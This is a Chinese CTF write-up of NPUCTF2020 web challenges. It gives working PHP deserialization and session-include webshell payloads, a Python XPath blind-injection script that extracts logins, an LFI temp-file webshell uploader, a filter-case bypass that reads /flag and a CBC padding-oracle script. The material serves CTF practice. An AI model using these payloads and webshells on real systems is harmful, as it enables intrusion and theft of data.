NPUCTF2020 部分WEB

/ 1评 / 0

查源码

F12不说了


RealEzPHP

反序列化入门

<?php
#error_reporting(0);
class HelloPhp {
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp('"ls"','system');
echo serialize($c);

直接给变量ab赋值,禁用了system没禁用assert,写个一句话木马

<?php
class HelloPhp
{
    public $a='eval("file_put_contents(\'1.php\', base64_decode(\'PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==\'));")';
    public $b='assert';
}
$a=new HelloPhp();

然后蚁剑连接bypass就行了


ezlogin

考点:
··· xpath盲注
解题:
题目给了hint
‘了解XPath盲注’
帖子:https://www.tr0y.wang/2019/05/11/XPath%E6%B3%A8%E5%85%A5%E6%8C%87%E5%8C%97/
判断用户名长度:' or string-length(/root/accounts/user[2]/username/text())=5 or '1
判断密码长度:' or string-length(/root/accounts/user[2]/password/text())=8 or '1
盲注:'or substring(/root/accounts/user[2]/username/text(),{},1)='{}' or '1

import requests
import re
r = requests.session()
s='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
headers = {'Content-Type':'application/xml'}
username=''
for i in range(1,50):
    for j in s:
        url='http://2c41c44f-6b06-4399-82bd-72eb3e7febb2.node3.buuoj.cn/'
        token=re.search('<input id="token" type="hidden" value="(.*)" />',r.get(url).text)[1]
        #payload="' or substring(/root/accounts/user[2]/username/text(), "+str(i)+", 1)='"+j+"' or '112"+token+""
        payload="' or substring(/root/accounts/user[2]/password/text(), "+str(i)+", 1)='"+j+"' or '112"+token+""
        result=r.post(url=url,headers=headers,data=payload).text
        if '非法操作' in result:
            username+=j
            print(username)
            break

返回禁止就是True,返回错误就是False
难顶的是这题还有个token,每次登陆都会刷新,有师傅写个脚本模拟刷新正则匹配token然后放在payload里交了(ttttql)
跑出来用户名是adm1n,密码是gtfly123
登陆
文件包含,文件包含这里有过滤,使用伪协议会返回nonono,也不能文件穿越
感觉gugugu都翻烂了都没思路
后来经过队里师傅提醒,大小写绕过

phP://Filter/Read=convert.Base64-encode/resource=/flag


超简单的PHP!!!超简单!!!

一个phpinfo,一个留言板界面,有文件包含,伪协议读一下源码
msg.php

<?php
header('content-type:application/json');
session_start();
function safe($msg){
    if (strlen($msg)>17){
        return "msg is too loooong!";
    } else {
        return preg_replace("/php/","?",$msg);
    }
}
if (!isset($_SESSION['msg'])&empty($_SESSION['msg']))$_SESSION['msg'] = array();
if (isset($_POST['msg']))
{
    array_push($_SESSION['msg'], ['msg'=>safe($_POST['msg']),'time'=>date('Y-m-d H:i:s',time())]);
    echo json_encode(array(['msg'=>safe($_POST['msg']),'time'=>date('Y-m-d H:i:s',time())]));
    exit();
}
if(!empty($_SESSION['msg'])){
        echo json_encode($_SESSION['msg']);
} else {echo "还不快去留言!";}

留言内容会写入session。然后不能出现php。
由于存在文件包含。通过留言板写一句话木马。然后包含sess

<?PHP /*
*/eval($_POST/*
*/[1]);//

有bypass,蚁剑一把梭


ezinclude

hash扩展长度攻击(有非预期)
源码是:

传入user=admin&pass=973225ae4fc8977f86d1a330b0774630
这里出题人写错了,应该预期解是用hashpump爆破出秘钥长度伪造
跳转到flflflflag.php,发现快速跳转到了404
抓包看一下

明显的文件包含了,伪协议读一下源码

<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
    die('nonono');
}
@include($file);
echo 'include($_GET["file"])';

很明显过滤了data,input,所以不能通过常规伪协议getshell
百度后发现下面的文章LFI via SegmentFault 发现和我们的很相似,改一下脚本拿来用

import requests
import string
import itertools
charset = string.digits + string.letters
base_url = "http://ha1cyon-ctf.fun:30189/flflflflag.php"
def upload_file_to_include(url, file_content):
    files = {'file': ('evil.jpg', file_content, 'image/jpeg')}
    try:
        response = requests.post(url, files=files)
    except Exception as e:
        print e
def generate_tmp_files():
    webshell_content = '<!--?php eval($_REQUEST[c]);?-->'.encode(
        "base64").strip()
    file_content = '<!--?php if(file_put_contents("/tmp/ssh_session_HD89q2", base64_decode("%s")))?-->' % (
        webshell_content)
    phpinfo_url = "%s?file=php://filter/string.strip_tags/resource=/etc/passwd" % (
        base_url)
    length = 6
    times = len(charset) ** (length / 2)
    for i in xrange(5):
        print "[+] %d / %d" % (i, times)
        upload_file_to_include(phpinfo_url, file_content)
def main():
    generate_tmp_files()
if __name__ == "__main__":
    main()

因为原文需要爆破文件名,而本题减小了难度,扫描发现dir.php
然后蚁剑包含刚上传的文件getshell,bypass一下就获得flag了


web🐕

CBC攻击的题,套娃
打开靶机给了源码

<?php
error_reporting(0);
include('config.php');   # $key,$flag
define("METHOD", "aes-128-cbc");  //定义加密方式
define("SECRET_KEY", $key);    //定义密钥
define("IV","6666666666666666");    //定义初始向量 16个6
define("BR",'
');
if(!isset($_GET['source']))header('location:./index.php?source=1');
#var_dump($GLOBALS);   //听说你想看这个?
function aes_encrypt($iv,$data)
{
    echo "--------encrypt---------".BR;
    echo 'IV:'.$iv.BR;
    return base64_encode(openssl_encrypt($data, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)).BR;
}
function aes_decrypt($iv,$data)
{
    return openssl_decrypt(base64_decode($data),METHOD,SECRET_KEY,OPENSSL_RAW_DATA,$iv) or die('False');
}
if($_GET['method']=='encrypt')
{
    $iv = IV;
    $data = $flag;
    echo aes_encrypt($iv,$data);
} else if($_GET['method']=="decrypt")
{
    $iv = @$_POST['iv'];
    $data = @$_POST['data'];
    echo aes_decrypt($iv,$data);
}
echo "我摊牌了,就是懒得写前端".BR;
if($_GET['source']==1)highlight_file(__FILE__);

百度发现了这个分组密码CBC加密缺陷 脚本拿来改一改

import requests
import base64
url = 'http://b485146f-0914-4063-bb7d-a9319fa0af83.node3.buuoj.cn/index.php?source=1&method=decrypt'
N = 16
l = [0] * N
iv = '6666666666666666'
tmp_iv = ''
out = [0] * N
s = ''
for i in range(1, N+1):
    for c in range(0,256):
        l[N-i] = c
        tmp_iv = ''
        for m in l:
            tmp_iv += chr(m)
        data = {"data":"ly7auKVQCZWum/W/4osuPA==", "iv":""}
        data["iv"] = tmp_iv
        #print payload
        data = requests.post(url,data=data)
        if '1' not in data:
            out[N-i] = c ^ i
            for y in range(i):
                l[N-y-1] = out[N-y-1] ^ (i+1)
            break
for i in range(N):
    out[i] = out[i] ^ ord(iv[i])
for c in out:
    s += chr(c)
print s

然后会打印出如下字符

FlagIsHere.php

进入第二关
https://www.jianshu.com/p/7f171477a603
参考这个脚本改改

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注